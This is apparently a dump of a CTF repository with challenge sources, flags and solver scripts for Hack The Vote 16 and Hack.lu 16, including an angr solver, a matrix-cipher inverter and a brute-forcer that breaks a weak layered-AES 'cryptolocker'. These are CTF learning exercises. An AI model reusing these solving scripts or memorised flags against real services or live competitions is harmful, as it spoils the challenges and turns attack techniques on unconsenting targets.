257 | 	solver.add(path.state.memory.load(0x60103c, size=1) == 0x80)
258 | 
259 | 	return [u64(c) for c in [
260 | 			p64(0)
261 | 			,solver.any_str(context_rbx)
262 | 			,solver.any_str(context_rcx)
263 | 			,solver.any_str(context_rdx)
264 | 			,solver.any_str(context_rsi)
265 | 			,solver.any_str(context_rdi)
266 | 			,solver.any_str(context_r8)
267 | 			,solver.any_str(context_r9)
268 | 			,solver.any_str(context_r10)
269 | 			,solver.any_str(context_r11)
270 | 			,solver.any_str(context_r12)
271 | 			,solver.any_str(context_r13)
272 | 			,solver.any_str(context_r14)
273 | 			,solver.any_str(context_r15)]]
274 | 
275 | 
276 | def get_flag():
277 | 	p = find_state()
278 | 	send_regs(p)
279 | ```
280 | 
281 | Few comments:
282 | * Since RAX doesn't influence the array, I set it as 0
283 | * The values for the non symbolic registers like rdx, rdi, r11, r12 and r15 come from debugging. They were constant between different runnings.
284 | * The hardcoded addresses of the symbolics came from a binary compiled with the above source code.
285 | 
286 | after running ```trumpervisor.get_flag()```, we get the real flag in addition to the hexadecimal value (which turned out to be meaningless):
287 | flag{HyP3rv1s04z_aRe_T3h_fuTuR3}
288 | 


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/Trumpervisor.bf38753e7bfc93d1bbf9aee6aa6dbdcd39d2ccd31f1547253a75209419f0828a.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/Trumpervisor.bf38753e7bfc93d1bbf9aee6aa6dbdcd39d2ccd31f1547253a75209419f0828a.i64


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/Trumpervisor.bf38753e7bfc93d1bbf9aee6aa6dbdcd39d2ccd31f1547253a75209419f0828a.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/Trumpervisor.bf38753e7bfc93d1bbf9aee6aa6dbdcd39d2ccd31f1547253a75209419f0828a.sys


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/a.out


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/flag.txt:
--------------------------------------------------------------------------------
1 | flag{HyP3rv1s04z_aRe_T3h_fuTuR3}


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/pic1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/pic1.png


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/pic2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/pic2.png


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/pic3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/pic3.png


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/pic4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/pic4.png


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/pic5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack The Vote 16/Trumpervisor/pic5.png


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/trumpervisor.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <inttypes.h>
 3 | 
 4 | uint64_t context_rcx;
 5 | uint64_t context_rbx;
 6 | uint64_t context_rdx;
 7 | uint64_t context_rdi;
 8 | uint64_t context_rsi;
 9 | uint64_t context_r8;
10 | uint64_t context_r9;
11 | uint64_t context_r10;
12 | uint64_t context_r11;
13 | uint64_t context_r12;
14 | uint64_t context_r13;
15 | uint64_t context_r14;
16 | uint64_t context_r15;
17 | 
18 | uint64_t r8_reg;
19 | uint64_t r9_reg;
20 | uint64_t r10_reg;
21 | uint64_t rax_reg;
22 | uint64_t rcx_reg;
23 | 
24 | char globals[8] = { 0 };
25 | 
26 | void main() {
27 | 	uint64_t i;
28 | 
29 | 	r9_reg = context_rcx;
30 | 	r9_reg -= context_r8;
31 | 	*((uint64_t*)globals) = r9_reg;
32 | 	rax_reg = context_r11;
33 | 	rax_reg &= r9_reg;
34 | 	r9_reg -= rax_reg;
35 | 	*((uint64_t*)globals) = r9_reg;
36 | 
37 | 	rcx_reg = context_r13;
38 | 	rax_reg = r9_reg;
39 | 	rax_reg >>= (rcx_reg & 0xff);
40 | 	r9_reg -= rax_reg;
41 | 	*((uint64_t*)globals) = r9_reg;
42 | 	rax_reg = context_r12;
43 | 	rax_reg += r9_reg;
44 | 	rax_reg <<= 3;
45 | 	*((uint64_t*)globals) = rax_reg;
46 | 
47 | 	r8_reg = 0;
48 | 	r8_reg = globals[0];
49 | 	globals[3] |= r8_reg & 0xff;
50 | 	globals[6] |= r8_reg & 0xff;
51 | 	rcx_reg = 0;
52 | 	rcx_reg = globals[1];
53 | 	globals[4] |= rcx_reg & 0xff;
54 | 	globals[7] |= rcx_reg & 0xff;
55 | 	rax_reg = 0;
56 | 	rax_reg = globals[2];
57 | 	globals[5] |= rax_reg && 0xff;
58 | 
59 | 	rcx_reg = context_rdi;
60 | 	rcx_reg -= context_rbx;
61 | 	rcx_reg -= context_rdx;
62 | 	r10_reg = *((uint64_t*)globals);
63 | 	r10_reg += rcx_reg;
64 | 	*((uint64_t*)globals) = r10_reg;
65 | 	r10_reg -= context_rsi;
66 | 	*((uint64_t*)globals) = r10_reg;
67 | 
68 | 	for (i = 0; i < context_rdx; i++) {
69 | 		rcx_reg = context_r15;
70 | 		r10_reg >>= rcx_reg & 0xff;
71 | 		*((uint64_t*)globals) = r10_reg;
72 | 		r10_reg -= context_r10;
73 | 		*((uint64_t*)globals) = r10_reg;
74 | 	}
75 | 
76 | 	rcx_reg = context_r15;
77 | 	r10_reg <<= rcx_reg & 0xff;
78 | 	*((uint64_t*)globals) = r10_reg;
79 | 	r10_reg += context_r9;
80 | 	*((uint64_t*)globals) = r10_reg;
81 | 	r10_reg -= context_r8;
82 | 	*((uint64_t*)globals) = r10_reg;
83 | 
84 | 	r10_reg += context_r14;
85 | 	*((uint64_t*)globals) = r10_reg;
86 | 	r10_reg -= context_rcx;
87 | 	*((uint64_t*)globals) = r10_reg;
88 | }


--------------------------------------------------------------------------------
/Hack The Vote 16/Trumpervisor/trumpervisor.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from time import sleep
 3 | import angr
 4 | 
 5 | REGS_ORDER = ['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15']
 6 | 
 7 | def send_regs(regs):
 8 | 	p = remote('trumpervisor.pwn.republican', 9000)
 9 | 
10 | 	for i in xrange(14):
11 | 		p.sendline(str(regs[i]))
12 | 		sleep(0.5)
13 | 		log.info('Sending {0} = {1}'.format(REGS_ORDER[i], regs[i]))		
14 | 
15 | 	print p.recv(2048, timeout=1)
16 | 
17 | def find_state():
18 | 	log.info('Open angr project and load entry state')
19 | 	p = angr.Project('a.out')
20 | 	state = p.factory.entry_state(addr=0x4004ED)
21 | 
22 | 	log.info('Creating and loading symbolics and constants')
23 | 	context_rcx = angr.claripy.BVS(name="context_rcx", size=8*8)
24 | 	context_rbx = angr.claripy.BVS(name="context_rbx", size=8*8)
25 | 	context_rdx = angr.claripy.BVV(int(p64(0x400).encode('hex'), 16), size=8*8)
26 | 	context_rdi = angr.claripy.BVV(int(p64(0x1aa000).encode('hex'), 16), size=8*8)
27 | 	context_rsi = angr.claripy.BVS(name="context_rsi", size=8*8)
28 | 	context_r8 = angr.claripy.BVS(name="context_r8", size=8*8)
29 | 	context_r9 = angr.claripy.BVS(name="context_r9", size=8*8)
30 | 	context_r10 = angr.claripy.BVS(name="context_r10", size=8*8)
31 | 	context_r11 = angr.claripy.BVV(int(p64(0x1).encode('hex'), 16), size=8*8)
32 | 	context_r12 = angr.claripy.BVV(int(p64(0).encode('hex'), 16), size=8*8)
33 | 	context_r13 = angr.claripy.BVS(name="context_r13", size=8*8)
34 | 	context_r14 = angr.claripy.BVS(name="context_r14", size=8*8)
35 | 	context_r15 = angr.claripy.BVV(int(p64(0).encode('hex'), 16), size=8*8)
36 | 
37 | 	state.memory.store(addr=0x601088, data=context_rcx)
38 | 	state.memory.store(addr=0x6010a0, data=context_rbx)
39 | 	state.memory.store(addr=0x6010d0, data=context_rdx)
40 | 	state.memory.store(addr=0x601060, data=context_rdi)
41 | 	state.memory.store(addr=0x601090, data=context_rsi)
42 | 	state.memory.store(addr=0x601068, data=context_r8)
43 | 	state.memory.store(addr=0x6010b0, data=context_r9)
44 | 	state.memory.store(addr=0x601058, data=context_r10)
45 | 	state.memory.store(addr=0x6010c8, data=context_r11)
46 | 	state.memory.store(addr=0x601050, data=context_r12)
47 | 	state.memory.store(addr=0x6010b8, data=context_r13)
48 | 	state.memory.store(addr=0x601048, data=context_r14)
49 | 	state.memory.store(addr=0x6010c0, data=context_r15)
50 | 	
51 | 	log.info('Stepping till the end of the program')
52 | 	path = p.factory.path(state)
53 | 	path = path.step()[0].step()[0]
54 | 
55 | 	for i in xrange(0x400):
56 | 		path = path.step()[0]
57 | 
58 | 	path = path.step()[0].step()[0]
59 | 
60 | 	log.info('Finding initial state')
61 | 	solver = path.state.se
62 | 	solver.add(path.state.memory.load(0x601039, size=1) == 0xb0)
63 | 	solver.add(path.state.memory.load(0x60103a, size=1) == 0x93)
64 | 	solver.add(path.state.memory.load(0x60103b, size=1) == 0x13)
65 | 	solver.add(path.state.memory.load(0x60103c, size=1) == 0x80)
66 | 
67 | 	return [u64(c) for c in [
68 | 			p64(0)
69 | 			,solver.any_str(context_rbx)
70 | 			,solver.any_str(context_rcx)
71 | 			,solver.any_str(context_rdx)
72 | 			,solver.any_str(context_rsi)
73 | 			,solver.any_str(context_rdi)
74 | 			,solver.any_str(context_r8)
75 | 			,solver.any_str(context_r9)
76 | 			,solver.any_str(context_r10)
77 | 			,solver.any_str(context_r11)
78 | 			,solver.any_str(context_r12)
79 | 			,solver.any_str(context_r13)
80 | 			,solver.any_str(context_r14)
81 | 			,solver.any_str(context_r15)]]
82 | 
83 | 
84 | def get_flag():
85 | 	p = find_state()
86 | 	send_regs(p)


--------------------------------------------------------------------------------
/Hack The Vote 16/Vermatrix Supreme/cryptor.py:
--------------------------------------------------------------------------------
 1 | import sys, random, time
 2 | 
 3 | flag = "flag{1_sw34r_1F_p30Pl3_4cTu4lLy_TrY_Th1s}"
 4 | 
 5 | def printmat(matrix):
 6 | 	for row in matrix:
 7 | 		for value in row:
 8 | 			print value,
 9 | 		print ""
10 | 	print ""
11 | 
12 | 
13 | def pad(s):
14 | 	if len(s)%9 == 0:
15 | 		return s
16 | 	for i in xrange((9-(len(s)%9))):
17 | 		s.append(0)
18 | 	return s
19 | 
20 | def genBlockMatrix(s):
21 | 	outm = [[[7 for x in xrange(3)] for x in xrange(3)] for x in xrange(len(s)/9)]
22 | 	# outm = [[[7, 7, 7], [7, 7, 7], [7, 7, 7]], [[7, 7, 7], [7, 7, 7], [7, 7, 7]], [[7, 7, 7], [7, 7, 7], [7, 7, 7]]]
23 | 	for matnum in xrange(0,len(s)/9):
24 | 		for y in xrange(0,3):
25 | 			for x in xrange(0,3):
26 | 				outm[matnum][y][x] = s[(matnum*9)+x+(y*3)]
27 | 	return outm
28 | 
29 | 
30 | def fixmatrix(matrixa, matrixb):
31 | 	out = [[0 for x in xrange(3)] for x in xrange(3)]	
32 | 	for rn in xrange(3):
33 | 		for cn in xrange(3):
34 | 			out[cn][rn] = (int(matrixa[rn][cn])|int(matrixb[cn][rn]))&~(int(matrixa[rn][cn])&int(matrixb[cn][rn]))
35 | 	return out
36 | 
37 | 
38 | def chall():
39 | 	IV = [c for c in '987398741']
40 | 	seed = "DHIEHKDLSL(#*HBDBM"
41 | 
42 | 	blocks = genBlockMatrix(pad(IV + [ord(c) for c in seed]))
43 | 	print blocks
44 | 
45 | 	res = [[0 for i in xrange(3)] for i in xrange(3)]
46 | 	for i in xrange(len(blocks)):
47 | 		res = fixmatrix(res, blocks[i])
48 | 
49 | 
50 | 	print "SEED: " + str(seed)
51 | 	printmat(res)
52 | 
53 | 	data = raw_input("")
54 | 
55 | 	data = data.replace(' ', '').strip()
56 | 
57 | 	if len(data) != 9:
58 | 		return False
59 | 
60 | 	for i in xrange(len(IV)):
61 | 		if str(IV[i]) != str(data[i]):
62 | 			return False
63 | 
64 | 	return True
65 | 
66 | 
67 | if chall():
68 | 	print flag
69 | 
70 | 


--------------------------------------------------------------------------------
/Hack The Vote 16/Vermatrix Supreme/orig.py:
--------------------------------------------------------------------------------
 1 | import sys, random, time
 2 | 
 3 | flag = "flag{1_sw34r_1F_p30Pl3_4cTu4lLy_TrY_Th1s}"
 4 | 
 5 | def printmat(matrix):
 6 | 	for row in matrix:
 7 | 		for value in row:
 8 | 			print value,
 9 | 		print ""
10 | 	print ""
11 | 
12 | 
13 | def pad(s):
14 | 	if len(s)%9 == 0:
15 | 		return s
16 | 	for i in xrange((9-(len(s)%9))):
17 | 		s.append(0)
18 | 	return s
19 | 
20 | def genBlockMatrix(s):
21 | 	outm = [[[7 for x in xrange(3)] for x in xrange(3)] for x in xrange(len(s)/9)]
22 | 	for matnum in xrange(0,len(s)/9):
23 | 		for y in xrange(0,3):
24 | 			for x in xrange(0,3):
25 | 				outm[matnum][y][x] = s[(matnum*9)+x+(y*3)]
26 | 	return outm
27 | 
28 | 
29 | def fixmatrix(matrixa, matrixb):
30 | 	out = [[0 for x in xrange(3)] for x in xrange(3)]	
31 | 	for rn in xrange(3):
32 | 		for cn in xrange(3):
33 | 			out[cn][rn] = (int(matrixa[rn][cn])|int(matrixb[cn][rn]))&~(int(matrixa[rn][cn])&int(matrixb[cn][rn]))
34 | 	return out
35 | 
36 | 
37 | def chall():
38 | 	IV = [c for c in '?????????']
39 | 	seed = "??????????????????"
40 | 
41 | 
42 | 	blocks = genBlockMatrix(pad(IV + [ord(c) for c in seed]))
43 | 
44 | 	res = [[0 for i in xrange(3)] for i in xrange(3)]
45 | 	for i in xrange(len(blocks)):
46 | 		res = fixmatrix(res, blocks[i])
47 | 
48 | 
49 | 	print "SEED: " + str(seed)
50 | 	printmat(res)
51 | 
52 | 	data = raw_input("")
53 | 
54 | 	data = data.replace(' ', '').strip().split(',')
55 | 
56 | 	if len(data) != 9:
57 | 		return False
58 | 
59 | 	for i in xrange(len(IV)):
60 | 		if str(IV[i]) != str(data[i]):
61 | 			return False
62 | 
63 | 	return True
64 | 
65 | 
66 | if chall():
67 | 	print flag
68 | 
69 | 


--------------------------------------------------------------------------------
/Hack The Vote 16/Vermatrix Supreme/solve.py:
--------------------------------------------------------------------------------
 1 | import sys, random, time
 2 | from pwn import *
 3 | 
 4 | flag = "flag{1_sw34r_1F_p30Pl3_4cTu4lLy_TrY_Th1s}"
 5 | 
 6 | def printmat(matrix):
 7 | 	for row in matrix:
 8 | 		for value in row:
 9 | 			print value,
10 | 		print ""
11 | 	print ""
12 | 
13 | def stringToMat(s):
14 | 	res1 = s.split('\n')
15 | 	res = []
16 | 	for l in res1:
17 | 		res += [l.split(' ')]
18 | 
19 | 	return res
20 | 
21 | 
22 | def pad(s):
23 | 	if len(s)%9 == 0:
24 | 		return s
25 | 	for i in xrange((9-(len(s)%9))):
26 | 		s.append(0)
27 | 	return s
28 | 
29 | def genBlockMatrix(s):
30 | 	outm = [[[7 for x in xrange(3)] for x in xrange(3)] for x in xrange(len(s)/9)]
31 | 	for matnum in xrange(0,len(s)/9):
32 | 		for y in xrange(0,3):
33 | 			for x in xrange(0,3):
34 | 				outm[matnum][y][x] = s[(matnum*9)+x+(y*3)]
35 | 	return outm
36 | 
37 | def genBlockMatrix_inv(outm):
38 | 	res = ['0']*len(outm)*9
39 | 	for matnum in xrange(len(outm)):
40 | 		for y in xrange(0,3):
41 | 			for x in xrange(0,3):
42 | 				res[(matnum*9)+x+(y*3)] = outm[matnum][y][x]
43 | 	return res
44 | 
45 | 
46 | def fixmatrix(matrixa, matrixb):
47 | 	out = [[0 for x in xrange(3)] for x in xrange(3)]	
48 | 	for rn in xrange(3):
49 | 		for cn in xrange(3):
50 | 			# out(m, n) = (a(n, m)|b(m, n))&~(a(n, m)&b(m, n))
51 | 			# n-th bit == 1 if it is set in exactly one number.
52 | 			out[cn][rn] = (int(matrixa[rn][cn])|int(matrixb[cn][rn]))&~(int(matrixa[rn][cn])&int(matrixb[cn][rn]))
53 | 	return out
54 | 
55 | def fixmatrix_Inv(matrixa, matrixb):
56 | 	out = [[0 for x in xrange(3)] for x in xrange(3)]	
57 | 	for rn in xrange(3):
58 | 		for cn in xrange(3):
59 | 			# out(m, n) = (a(n, m)|b(m, n))&~(a(n, m)&b(m, n))
60 | 			# n-th bit == 1 if it is set in exactly one number.
61 | 			out[cn][rn] = (int(matrixa[rn][cn])|int(matrixb[rn][cn]))&~(int(matrixa[rn][cn])&int(matrixb[rn][cn]))
62 | 	return out
63 | 
64 | def find_IV(res, seed):
65 | 	seed_full = 'A'*9 + seed
66 | 
67 | 	blocks = genBlockMatrix(pad([ord(c) for c in seed]))
68 | 
69 | 	for i in xrange(len(seed)/9):
70 | 		res = fixmatrix_Inv(blocks[-1-i], res)
71 | 
72 | 	res = fixmatrix([[0 for i in xrange(3)] for i in xrange(3)], res)
73 | 	return ','.join([','.join([str(c) for c in i]) for i in res])
74 | 
75 | 
76 | def solve():
77 | 	p = remote('vermatrix.pwn.democrat', 4201)
78 | 	data = p.recv(2048, timeout=1)
79 | 	seed = data[6:data.find('\n')]
80 | 	matrix_s = data[data.find('\n'):][1:-1]
81 | 	matrix = stringToMat(matrix_s)
82 | 	iv = find_IV(matrix, seed)
83 | 	p.sendline(iv)
84 | 	return p.recv(2048, timeout=1)
85 | 


--------------------------------------------------------------------------------
/Hack.lu 16/cryptolocker/AESCipher.py:
--------------------------------------------------------------------------------
 1 | from Crypto import Random
 2 | from Crypto.Cipher import AES
 3 | 
 4 | class AESCipher(object):
 5 |     """
 6 |     A classical AES Cipher. Can use any size of data and any size of password thanks to padding.
 7 |     Also ensure the coherence and the type of the data with a unicode to byte converter.
 8 |     Source: http://depado.markdownblog.com/2015-05-11-aes-cipher-with-python-3-x
 9 |     """
10 |     def __init__(self, key):
11 |         self.bs = 32
12 |         self.key = key
13 | 
14 |     @staticmethod
15 |     def str_to_bytes(data):
16 |         u_type = type(b''.decode('utf8'))
17 |         if isinstance(data, u_type):
18 |             return data.encode('utf8')
19 |         return data
20 | 
21 |     def _pad(self, s):
22 |         return s + (self.bs - len(s) % self.bs) * AESCipher.str_to_bytes(chr(self.bs - len(s) % self.bs))
23 | 
24 |     @staticmethod
25 |     def _unpad(s):
26 |         return s[:-ord(s[len(s)-1:])]
27 | 
28 |     def encrypt(self, raw):
29 |         raw = self._pad(AESCipher.str_to_bytes(raw))
30 |         iv = Random.new().read(AES.block_size)
31 |         cipher = AES.new(self.key, AES.MODE_CBC, iv)
32 |         return iv + cipher.encrypt(raw)
33 | 
34 |     def decrypt(self, enc):
35 |         iv = enc[:AES.block_size]
36 |         cipher = AES.new(self.key, AES.MODE_CBC, iv)
37 |         return cipher.decrypt(enc[AES.block_size:])
38 | 


--------------------------------------------------------------------------------
/Hack.lu 16/cryptolocker/break.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | import sys
 3 | import hashlib
 4 | import itertools
 5 | from AESCipher import *
 6 | 
 7 | CHARS =  [chr(i) for i in xrange(32, 127)]
 8 | 
 9 | def break_next(curr_cipher, condition_function):
10 |     res_chars = ''
11 |     g = itertools.product(CHARS, CHARS)
12 |     while True:
13 |         try:
14 |             curr_chars = ''.join(g.next())
15 |         except StopIteration:
16 |             break
17 | 
18 |         cipher = AESCipher(hashlib.sha256(curr_chars).digest())
19 | 
20 |         plain = cipher.decrypt(curr_cipher)
21 |         if condition_function(plain):
22 |             res_chars = curr_chars
23 |             curr_cipher = cipher._unpad(plain)
24 |             break
25 | 
26 |     return curr_cipher, res_chars
27 |  
28 | if __name__ == "__main__":
29 |     # Read file to be encrypted
30 |     filename = 'flag.encrypted'
31 |     ciphertext = open(filename, "rb").read()
32 | 
33 |     for i in xrange(3):
34 |         ciphertext, curr_chars = break_next(ciphertext, lambda plain: plain[-16:] == '\x10'*16)
35 | 
36 |     plain, first_chars = break_next(ciphertext, lambda plain: 'PK' == plain[0:2])
37 |     open('{0}.decrypted'.format(filename), 'wb').write(plain)


--------------------------------------------------------------------------------
/Hack.lu 16/cryptolocker/cryptolock.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | import sys
 3 | import hashlib
 4 | from AESCipher import *
 5 | 
 6 | class SecureEncryption(object):
 7 |     def __init__(self, keys):
 8 |         assert len(keys) == 4
 9 |         self.keys = keys
10 |         self.ciphers = []
11 |         for i in range(4):
12 |             self.ciphers.append(AESCipher(keys[i]))
13 | 
14 |     def enc(self, plaintext): # Because one encryption is not secure enough
15 |         one        = self.ciphers[0].encrypt(plaintext)
16 |         two        = self.ciphers[1].encrypt(one)
17 |         three      = self.ciphers[2].encrypt(two)
18 |         ciphertext = self.ciphers[3].encrypt(three)
19 |         return ciphertext
20 | 
21 |     def dec(self, ciphertext):
22 |         three      = AESCipher._unpad(self.ciphers[3].decrypt(ciphertext))
23 |         two        = AESCipher._unpad(self.ciphers[2].decrypt(three))
24 |         one        = AESCipher._unpad(self.ciphers[1].decrypt(two))
25 |         plaintext  = AESCipher._unpad(self.ciphers[0].decrypt(one))
26 |         return plaintext
27 | 
28 | if __name__ == "__main__":
29 |     if len(sys.argv) != 3:
30 |         print("Usage: ./cryptolock.py file-you-want-to-encrypt password-to-use")
31 |         exit()
32 | 
33 |     # Read file to be encrypted
34 |     filename = sys.argv[1]
35 |     plaintext = open(filename, "rb").read()
36 | 
37 |     user_input = sys.argv[2].encode('utf-8')
38 |     assert len(user_input) == 8
39 |     i = len(user_input) // 4
40 |     keys = [ # Four times 256 is 1024 Bit strength!! Unbreakable!!
41 |         hashlib.sha256(user_input[0:i]).digest(),
42 |         hashlib.sha256(user_input[i:2*i]).digest(),
43 |         hashlib.sha256(user_input[2*i:3*i]).digest(),
44 |         hashlib.sha256(user_input[3*i:4*i]).digest(),
45 |     ]
46 |     s = SecureEncryption(keys)
47 | 
48 |     ciphertext = s.enc(plaintext)
49 |     plaintext_ = s.dec(ciphertext)
50 |     assert plaintext == plaintext_
51 | 
52 |     open(filename+".encrypted", "wb").write(ciphertext)
53 | 


--------------------------------------------------------------------------------
/Hack.lu 16/cryptolocker/flag.encrypted:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack.lu 16/cryptolocker/flag.encrypted


--------------------------------------------------------------------------------
/Hack.lu 16/cthulhusoft/cthulusoft_d68d9aa1817e5a43233efa11d6fda9be:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack.lu 16/cthulhusoft/cthulusoft_d68d9aa1817e5a43233efa11d6fda9be


--------------------------------------------------------------------------------
/Hack.lu 16/cthulhusoft/cthulusoft_d68d9aa1817e5a43233efa11d6fda9be.i64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack.lu 16/cthulhusoft/cthulusoft_d68d9aa1817e5a43233efa11d6fda9be.i64


--------------------------------------------------------------------------------
/Hack.lu 16/cthulhusoft/last part calculation.txt:
--------------------------------------------------------------------------------
 1 | all aritmethics is module 0xB8C827FD
 2 | 
 3 | do
 4 |     {
 5 |       v95 *= v95;
 6 |       if ( _bittest(&v94, v93) )
 7 |         v95 *= v80;
 8 |       --v93;
 9 |     }
10 |     while ( v93 != -1LL );
11 | 
12 | it is just some pow-modulu of initial value in v95.
13 | Calculate the exponent - 
14 | 
15 | n = '001101110100011001010100100011'
16 | e = 1
17 | for i in xrange(30):
18 |     e *= 2
19 |         if n[i] == '1':
20 |             e += 1
21 | 
22 | => e = 1305580835, modulu = 0xB8C827FD = 51787*59863 (two primes - p, q)
23 | phi(m) =  (51787-1)*(59863-1) ==> d = 1859368307


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_24001a4e2a4cfb06392de6c887e8101b.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack.lu 16/dataonly/dataonly_24001a4e2a4cfb06392de6c887e8101b.tar


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/cfi.asm:
--------------------------------------------------------------------------------
  1 | section .text
  2 | 
  3 | 
  4 | ; ============= control flow stuff =============
  5 | %define SYSCALL_read 0
  6 | %define SYSCALL_write 1
  7 | %define SYSCALL_lseek 8
  8 | %define SEEK_CUR 1
  9 | %define POINTER_SIZE 8
 10 | %define STACK_FD 3
 11 | 
 12 | fast_abort:
 13 |   ud2
 14 | 
 15 | ; call target function, clobbering rax
 16 | global do_call
 17 | do_call:
 18 |   ;save regs
 19 |   push rdi
 20 |   push rsi
 21 |   push rdx
 22 |   push rcx ; clobbered by syscall, needed for arg4
 23 | 
 24 |   ;write
 25 |   mov rax, SYSCALL_write
 26 |   mov rdi, STACK_FD
 27 |   mov rsi, rsp
 28 |   add rsi, 4 * POINTER_SIZE
 29 |   mov rdx, POINTER_SIZE
 30 |   syscall
 31 |   cmp rax, POINTER_SIZE
 32 |   jne fast_abort
 33 | 
 34 |   ; restore regs
 35 |   pop rcx
 36 |   pop rdx
 37 |   pop rsi
 38 |   pop rdi
 39 | 
 40 |   ; grab args
 41 |   pop rax ; return address
 42 |   pop rax ; target address
 43 | 
 44 |   ; make it look like a normal stackframe
 45 |   push 0x01234567
 46 |   jmp rax
 47 | 
 48 | 
 49 | ; return to caller, clobbering rdi
 50 | global do_return
 51 | do_return:
 52 |   ; remove 0x01234567
 53 |   add rsp, POINTER_SIZE
 54 | 
 55 |   ; save rax
 56 |   push rax
 57 | 
 58 |   ;lseek -8
 59 |   mov rax, SYSCALL_lseek
 60 |   mov rdi, STACK_FD
 61 |   mov rsi, -8
 62 |   mov rdx, SEEK_CUR
 63 |   syscall
 64 |   cmp rax, -10000
 65 |   ja fast_abort
 66 | 
 67 |   ;read saved pointer into rdi
 68 |   push 0
 69 |   mov rax, SYSCALL_read
 70 |   mov rdi, STACK_FD
 71 |   mov rsi, rsp
 72 |   mov rdx, POINTER_SIZE
 73 |   syscall
 74 | 
 75 |   ;lseek -8
 76 |   mov rax, SYSCALL_lseek
 77 |   mov rdi, STACK_FD
 78 |   mov rsi, -8
 79 |   mov rdx, SEEK_CUR
 80 |   syscall
 81 |   cmp rax, -10000
 82 |   ja fast_abort
 83 | 
 84 |   pop rdi
 85 | 
 86 |   ; restore rax
 87 |   pop rax
 88 | 
 89 |   ; return
 90 |   jmp rdi
 91 | 
 92 | 
 93 | ; ============= syscalls =============
 94 | 
 95 | global DO_syscall
 96 | DO_syscall:
 97 |   mov rax, rdi
 98 |   mov rdi, rsi
 99 |   mov rsi, rdx
100 |   mov rdx, rcx
101 |   mov r10, r8
102 |   mov r8, r9
103 |   syscall
104 |   jmp do_return


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/compile.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | set -u -e
 3 | 
 4 | gcc -S -Wall -std=gnu99 -o main.S main.c -ggdb
 5 | # Here comes our amazing CFI post-processing.
 6 | # Please prepare eye bleach before continuing.
 7 | if grep 'call\s[^D]' main.S; then
 8 |   echo "ERROR: bad calls"
 9 |   exit 1
10 | fi
11 | sed -i 's|^\scall\s\(.*\)$|\tpush $\1\n\tcall do_call|g' main.S
12 | sed -i 's|^\sret|jmp do_return|g' main.S
13 | gcc -c -o main.o main.S
14 | 
15 | nasm -f elf64 cfi.asm
16 | gcc -ggdb -Wall -std=gnu99 -o launch launch.c main.o cfi.o
17 | 
18 | gcc -o server server.c -Wall -std=gnu99 -ggdb
19 | 


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/launch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dapollak/ctf/6e0fb1b96d3bab12057d34a11bc24d91a78b79a1/Hack.lu 16/dataonly/dataonly_release/launch


--------------------------------------------------------------------------------
/Hack.lu 16/dataonly/dataonly_release/launch.c:
--------------------------------------------------------------------------------
 1 | #define _GNU_SOURCE
 2 | #include <err.h>
 3 | #include <unistd.h>
 4 | #include <sys/syscall.h>
 5 | #include <sys/types.h>
 6 | #include <sys/stat.h>
 7 | #include <fcntl.h>
 8 | 
 9 | void DO_app_main(char *webroot);
10 | 
11 | int main(int argc, char **argv) {
12 |   if (argc != 2)
13 |   	errx(1, "bad invocation of launch binary");
14 |   alarm(300);
15 |   close(3);
16 | /*
